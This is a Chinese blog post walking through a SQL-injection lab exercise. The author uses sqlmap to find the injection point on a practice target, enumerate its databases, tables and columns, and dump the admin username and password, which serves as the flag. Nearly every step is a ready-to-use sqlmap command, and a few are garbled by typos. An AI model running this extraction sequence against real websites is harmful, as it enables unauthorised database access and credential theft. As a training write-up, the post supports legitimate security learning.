sql注入攻击

82 阅读1分钟

持续创作,加速成长!这是我参与「掘金日新计划 · 10 月更文挑战」的第5天
10月更文诚意加码,激发写作潜力|掘金·日新计划 - 掘金 (juejin.cn)点击查看活动详情

进入给到的靶机

打开kali,使用sqlmap工具,

使用命令sqlmap -u “rhiq8003.ia.aqlab.cn/id=1" --batch

-batch所有要求输入的都使用默认值

检查是否有注入点

可以看到存在sql注入漏洞

查看一下数据库的表

使用命令sqlmap -u “rhiq8003.ia.aqlab.cn/?id=1” -dbs -batch

-dbs查看当前的数据库信息    

发现有4个数据库,我们可以开4个kali终端窗口,一起查询4个不同数据库

使用命令sqlmap -u “rhiq8003.ia.aqlab.cn/?id=1" -D "数据库名称" -tables - batch

-D指定数据库 -tables为查询当前数据库所在的表

查询结果:

查询到maoshe数据库,表为admin,dirs,news,xss      4个表

一般来说账号密码放在admin的可能性大点,那么就先从admin表下手

使用命令:
sqlmap -u “rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin -columns -batch

-T指定表       -columns查找字段名字

这里只需要提取password和username就好了

查看具体内容

使用命令sqlmap -u “ rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin -C user"password,username" -dump -batch

-C指定字段名称    -dump查询出字段

得到admin的密码为helloback

flag:helloback